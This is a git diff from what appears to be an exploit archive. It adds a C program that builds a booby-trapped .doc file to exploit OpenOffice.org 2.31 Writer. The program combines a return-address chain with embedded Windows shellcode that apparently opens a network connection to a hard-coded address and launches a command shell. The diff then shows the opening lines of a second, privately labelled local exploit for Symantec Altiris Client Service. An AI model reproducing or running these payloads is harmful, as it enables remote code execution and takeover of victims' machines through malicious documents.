+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00" +"\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\x08\x00\x00\x00" +"\x09\x00\x00\x00\x0a\x00\x00\x00\x0b\x00\x00\x00\x0c\x00\x00\x00" +"\x0d\x00\x00\x00\x0e\x00\x00\x00\x0f\x00\x00\x00\x10\x00\x00\x00" +"\x11\x00\x00\x00\x12\x00\x00\x00\x13\x00\x00\x00\x14\x00\x00\x00" +"\x15\x00\x00\x00\x16\x00\x00\x00\x17\x00\x00\x00\x18\x00\x00\x00" +"\x19\x00\x00\x00\x1a\x00\x00\x00\x1b\x00\x00\x00\x1c\x00\x00\x00" +"\x1d\x00\x00\x00\x1e\x00\x00\x00\x1f\x00\x00\x00\x20\x00\x00\x00" +"\x21\x00\x00\x00\x22\x00\x00\x00\x23\x00\x00\x00\x24\x00\x00\x00" +"\x25\x00\x00\x00\x26\x00\x00\x00\x27\x00\x00\x00\x28\x00\x00\x00" +"\x29\x00\x00\x00\x2a\x00\x00\x00\x2b\x00\x00\x00\x2c\x00\x00\x00" +"\x2d\x00\x00\x00\x2e\x00\x00\x00\x2f\x00\x00\x00\x30\x00\x00\x00" +"\x31\x00\x00\x00\x32\x00\x00\x00\x33\x00\x00\x00\x34\x00\x00\x00" +"\x35\x00\x00\x00\x36\x00\x00\x00\x37\x00\x00\x00\x38\x00\x00\x00" +"\x39\x00\x00\x00\x3a\x00\x00\x00\x3b\x00\x00\x00\x3c\x00\x00\x00" +"\x3d\x00\x00\x00\x3e\x00\x00\x00\x3f\x00\x00\x00\x40\x00\x00\x00" 
+"\x41\x00\x00\x00\x42\x00\x00\x00\x43\x00\x00\x00\x44\x00\x00\x00" +"\x45\x00\x00\x00\x46\x00\x00\x00\x47\x00\x00\x00\x48\x00\x00\x00" +"\x49\x00\x00\x00\x4a\x00\x00\x00\x4b\x00\x00\x00\x4c\x00\x00\x00" +"\x4d\x00\x00\x00\x4e\x00\x00\x00\x4f\x00\x00\x00\x50\x00\x00\x00" +"\x51\x00\x00\x00\x52\x00\x00\x00\x53\x00\x00\x00\x54\x00\x00\x00" +"\x55\x00\x00\x00\x56\x00\x00\x00\x57\x00\x00\x00\x58\x00\x00\x00" +"\x59\x00\x00\x00\x5a\x00\x00\x00\x5b\x00\x00\x00\x5c\x00\x00\x00" +"\x5d\x00\x00\x00\x5e\x00\x00\x00\x5f\x00\x00\x00\x60\x00\x00\x00" +"\x61\x00\x00\x00\x62\x00\x00\x00\x63\x00\x00\x00\x64\x00\x00\x00" +"\x65\x00\x00\x00\x66\x00\x00\x00\x67\x00\x00\x00\x68\x00\x00\x00" +"\x69\x00\x00\x00\x6a\x00\x00\x00\x6b\x00\x00\x00\x6c\x00\x00\x00" +"\x6d\x00\x00\x00\x6e\x00\x00\x00\x6f\x00\x00\x00\x70\x00\x00\x00" +"\x71\x00\x00\x00\x72\x00\x00\x00\x73\x00\x00\x00\x74\x00\x00\x00" +"\x75\x00\x00\x00\x76\x00\x00\x00\x77\x00\x00\x00\x78\x00\x00\x00" +"\x79\x00\x00\x00\x7a\x00\x00\x00\x7b\x00\x00\x00\x7c\x00\x00\x00" +"\x7d\x00\x00\x00\x7e\x00\x00\x00\x7f\x00\x00\x00\x80\x00\x00\x00" +"\x81\x00\x00\x00\xfe\xff\xff\xff\x83\x00\x00\x00\x84\x00\x00\x00" +"\x85\x00\x00\x00\x86\x00\x00\x00\x87\x00\x00\x00\x88\x00\x00\x00" +"\x89\x00\x00\x00\x8a\x00\x00\x00\x8b\x00\x00\x00\x8c\x00\x00\x00" +"\x8d\x00\x00\x00\x8e\x00\x00\x00\x8f\x00\x00\x00\x90\x00\x00\x00" +"\x91\x00\x00\x00\x92\x00\x00\x00\x93\x00\x00\x00\xfe\xff\xff\xff" +"\x95\x00\x00\x00\x96\x00\x00\x00\x97\x00\x00\x00\x98\x00\x00\x00" +"\x99\x00\x00\x00\x9a\x00\x00\x00\x9b\x00\x00\x00\x9c\x00\x00\x00" +"\x9d\x00\x00\x00\x9e\x00\x00\x00\x9f\x00\x00\x00\xa0\x00\x00\x00" +"\xa1\x00\x00\x00\xa2\x00\x00\x00\xa3\x00\x00\x00\xa4\x00\x00\x00" +"\xa5\x00\x00\x00\xa6\x00\x00\x00\xa7\x00\x00\x00\xa8\x00\x00\x00" +"\xa9\x00\x00\x00\xaa\x00\x00\x00\xab\x00\x00\x00\xac\x00\x00\x00" +"\xad\x00\x00\x00\xae\x00\x00\x00\xaf\x00\x00\x00\xb0\x00\x00\x00" +"\xb1\x00\x00\x00\xb2\x00\x00\x00\xb3\x00\x00\x00\xb4\x00\x00\x00" 
+"\xb5\x00\x00\x00\xb6\x00\x00\x00\xb7\x00\x00\x00\xb8\x00\x00\x00" +"\xb9\x00\x00\x00\xba\x00\x00\x00\xbb\x00\x00\x00\xbc\x00\x00\x00" +"\xbd\x00\x00\x00\xbe\x00\x00\x00\xbf\x00\x00\x00\xc0\x00\x00\x00" +"\xc1\x00\x00\x00\xc2\x00\x00\x00\xc3\x00\x00\x00\xc4\x00\x00\x00" +"\xc5\x00\x00\x00\xc6\x00\x00\x00\xc7\x00\x00\x00\xc8\x00\x00\x00" +"\x94\x00\x00\x00\xca\x00\x00\x00\xcb\x00\x00\x00\xfe\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xd5\x00\x00\x00\xd6\x00\x00\x00\xd7\x00\x00\x00\xd8\x00\x00\x00" +"\xd9\x00\x00\x00\xda\x00\x00\x00\xdb\x00\x00\x00\xfe\xff\xff\xff" +"\xfd\xff\xff\xff\xfd\xff\xff\xff\xdf\x00\x00\x00\xfe\xff\xff\xff" +"\xfe\xff\xff\xff\xe2\x00\x00\x00\xfe\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\x52\x00\x6f\x00\x6f\x00\x74\x00\x20\x00\x45\x00\x6e\x00\x74\x00" +"\x72\x00\x79\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x16\x00\x05\x6d\xff\xff\xff\xff\xff\xff\xff\xff\x03\x00\x00\x00" +"\x06\x09\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x53\x3f\x53" +"\x31\x1d\xc6\x01\xe1\x00\x00\x00\x40\x02\x00\x00\x00\x00\x00\x00" +"\x44\x00\x61\x00\x74\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x0a\x00\x02\x01\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x82\x00\x00\x00\x2c\x22\x00\x00\x00\x00\x00\x00"
+"\x31\x00\x54\x00\x61\x00\x62\x00\x6c\x00\x65\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x0e\x00\x02\x01\x01\x00\x00\x00\x06\x00\x00\x00\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x94\x00\x00\x00\x7d\x6f\x00\x00\x00\x00\x00\x00"
+"\x57\x6f\x6f\x6f\x72\x72\x64\x00\x44\x00\x6f\x00\x63\x00\x75\x00"
+"\x6d\x00\x65\x00\x6e\x00\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x1a\x00\x02\x01\x02\x00\x00\x00\x05\x00\x00\x00\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x29\x02\x01\x00\x00\x00\x00\x00"
+"\x05\x00\x53\x00\x75\x00\x6d\x00\x6d\x00\x61\x00\x72\x00\x79\x00"
+"\x49\x00\x6e\x00\x66\x00\x6f\x00\x72\x00\x6d\x00\x61\x00\x74\x00"
+"\x69\x00\x6f\x00\x6e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x28\x00\x02\x01\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x02\x00\x00\x00\xb0\x01\x00\x00\x00\x00\x00\x00"
+"\x05\x00\x44\x00\x6f\x00\x63\x00\x75\x00\x6d\x00\x65\x00\x6e\x00"
+"\x74\x00\x53\x00\x75\x00\x6d\x00\x6d\x00\x61\x00\x72\x00\x79\x00"
+"\x49\x00\x6e\x00\x66\x00\x6f\x00\x72\x00\x6d\x00\x61\x00\x74\x00"
+"\x69\x00\x6f\x00\x6e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x38\x00\x02\x01\x04\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xf0"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\xd4\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00"
+"\x01\x00\x43\x00\x6f\x00\x6d\x00\x70\x00\x4f\x00\x62\x00\x6a\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x12\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x6a\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+;
+char file_part9[]=
+"\x01\x00\x00\x00\xfe\xff\xff\xff\x03\x00\x00\x00\x04\x00\x00\x00"
+"\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\x08\x00\x00\x00"
+"\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x01\x41\x41\x41\x41\xfe\x45\x93\x60\x43\x43\x43\x43\xa8\xef\xff"
+"\xff\xbd\x5c\x91\x60\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
+"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
+"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
+"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
+"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
+"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
+"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
+"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
+"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
+"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68"
+"\xc0\xa8\x00\xc6\x66\x68\x7a\x51\x66\x53\x89\xe1\x95\x68\xec\xf9"
+"\xaa\x60\x57\xff\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68"
+"\x63\x6d\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3"
+"\xaa\x95\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab"
+"\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51"
+"\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff\xd6"
+"\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04\xff\xd6"
+"\xff\x77\xfc\xff\xd0\x68\x7e\xd8\xe2\x73\x53\xff\xd6\xff\xd0\x44"
+"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44"
+"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44"
+"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44"
+"\x00\x00\x00\x14\x00\x00\x00\x4d\x69\x63\x72\x6f\x73\x6f\x66\x74"
+"\x20\x57\x6f\x72\x64\x20\x31\x30\x2e\x30\x00\x40\x00\x00\x00\x00"
+"\x8c\x86\x47\x00\x00\x00\x00\x40\x00\x00\x00\x00\x46\x4c\x26\x97"
+"\xea\xc3\x01\x40\x00\x00\x00\x00\xea\xff\x56\x9f\x1b\xc6\x01\x40"
+"\x00\x00\x00\x00\xbe\xae\xfd\x65\x1c\xc6\x01\x03\x00\x00\x00\x00"
+;
+
+
+
+int main(int argc, char *argv[]) {
+ FILE* file;
+ char evilbuff[200000];
+ int offset=0;
+
+ printf("[+] Open Office.org 2.31 swriter code execution\n");
+ printf("[+] Marsupilamipowa@hotmail.fr\n");
+ if (argc!=2) {
+ printf("[+] Usage: %s file.doc \n",argv[0]);
+ return 0;
+ }
+
+ memcpy(evilbuff+offset,file_part0,sizeof(file_part0)-1);
+ offset+=sizeof(file_part0)-1;
+ memcpy(evilbuff+offset,file_part1,sizeof(file_part1)-1);
+ offset+=sizeof(file_part1)-1;
+ memcpy(evilbuff+offset,file_part2,sizeof(file_part2)-1);
+ offset+=sizeof(file_part2)-1;
+ memcpy(evilbuff+offset,file_part3,sizeof(file_part3)-1);
+ offset+=sizeof(file_part3)-1;
+ memcpy(evilbuff+offset,file_part4,sizeof(file_part4)-1);
+ offset+=sizeof(file_part4)-1;
+ memcpy(evilbuff+offset,file_part5,sizeof(file_part5)-1);
+ offset+=sizeof(file_part5)-1;
+ memcpy(evilbuff+offset,file_part6,sizeof(file_part6)-1);
+ offset+=sizeof(file_part6)-1;
+ memcpy(evilbuff+offset,file_part7,sizeof(file_part7)-1);
+ offset+=sizeof(file_part7)-1;
+ memcpy(evilbuff+offset,file_part8,sizeof(file_part8)-1);
+ offset+=sizeof(file_part8)-1;
+ memcpy(evilbuff+offset,file_part9,sizeof(file_part9)-1);
+ offset+=sizeof(file_part9)-1;
+
+ /*
+ At the moment eip gets owned, ebx is controllable. Shellcode is at esp+0xFFFFEFA8.
+ So first, ADD ESP, EBX then RET and finally PUSH ESP - RET.
+ */
+
+ memcpy(evilbuff+0x1c415,"\xFE\x45\x93\x60",4); //ADD ESP, EBX ... RET in tl680mi
+ memcpy(evilbuff+0x1c411,"\xBD\x5C\x91\x60",4); //PUSH ESP - RET in tl680mi
+ memcpy(evilbuff+0x1c40D,"\xA8\xEF\xFF\xFF",4); //value for EBX
+ memcpy(evilbuff+0x1c460,calc,sizeof(calc)-1);
+
+ if ((file=fopen(argv[1],"wb"))==0) {
+ printf("[-] Unable to access file.\n");
+ return 0;
+ }
+
+ fwrite( evilbuff, 1, offset, file );
+ fclose(file);
+ printf("[+] Done. 
Have fun!\n");
+ return 0;
+}
+
+// milw0rm.com [2008-05-10]
diff --git a/platforms/windows/local/5625.c b/platforms/windows/local/5625.c
index 817b3444c..ec15ffbf5 100755
--- a/platforms/windows/local/5625.c
+++ b/platforms/windows/local/5625.c
@@ -1,152 +1,152 @@
-// 0day PRIVATE NOT DISTRIBUTE!!!
-//
-// Symantec Altiris Client Service Local Exploit (0day)
-//
-// Affected Versions : Altiris Client 6.5.248
- Altiris Client 6.5.299
- Altiris client 6.8.378
-//
-// Alex Hernandez aka alt3kx
-// ahernandez [at] sybsecurity.com
-//
-// Eduardo Vela aka sirdarckcat
-// sirdarckcat [at] gmail.com
-//
-// We'll see you soon at ph-neutral 0x7d8
-
-#include "stdio.h"
-#include "windows.h"
-
-int main(int argc, char* argv[])
-{
- HWND lHandle, lHandle2;
- POINT point;
- int id,a=0;
- char langH[255][255];
- char langO[255][255];
- char wname[]="Altiris Client Service";
-
- strcpy(langH[0x0c],"Aide de Windows");
- strcpy(langH[0x09],"Windows Help");
- strcpy(langH[0x0a],"Ayuda de Windows");
-
